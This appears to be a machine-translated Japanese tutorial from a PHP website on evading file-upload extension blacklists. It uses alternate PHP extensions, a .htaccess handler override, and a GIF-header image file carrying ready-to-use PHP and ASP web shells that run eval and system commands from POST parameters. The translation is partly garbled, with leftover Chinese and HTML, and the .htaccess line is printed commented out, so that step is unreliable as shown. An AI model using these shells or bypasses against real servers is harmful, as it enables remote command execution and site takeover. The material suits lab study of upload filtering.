ファイルをアップロードするときにブラックリストを回避する方法

この記事では主に、ファイルをアップロードしてブラックリストを回避する方法を紹介します。これには特定の参考値があります。今、あなたと共有します。必要な友達はそれを参照できます。

このレベルでは主に、アップロードサフィックス. 、asp、php、jsp などのサフィックスを制限し、アップロードは許可されません。

位置 1: このバイパス方法は、サフィックスを .php3、php5 などに変更することです。ブラックリストの検証は次のとおりです ('.asp'、'.aspx'、'.php'、'.jsp') ) を使用すると、php3、php5... およびサーバーで解析できるその他のサフィックス名をアップロードできます

##ポジション 2: ファイル解析ルールをバイパスするように書き換えます

1. まずアップロードします。次の内容を含む

.htaccess

という名前のファイルをアップロードします:

# SetHandler application/x-httpd-php

2. 1.jpg スクリプトをアップロードします

内容:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>

<span style="margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important"><br/>最后查看结果如下：<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>

上記がこの記事の全内容です。関連コンテンツについては、PHP 中国語 Web サイトをご覧ください。

関連する推奨事項:

PHP は Azure Storage Blob を使用してファイルをアップロードします

nginx memcache キャッシュの概要

以上がファイルをアップロードするときにブラックリストを回避する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。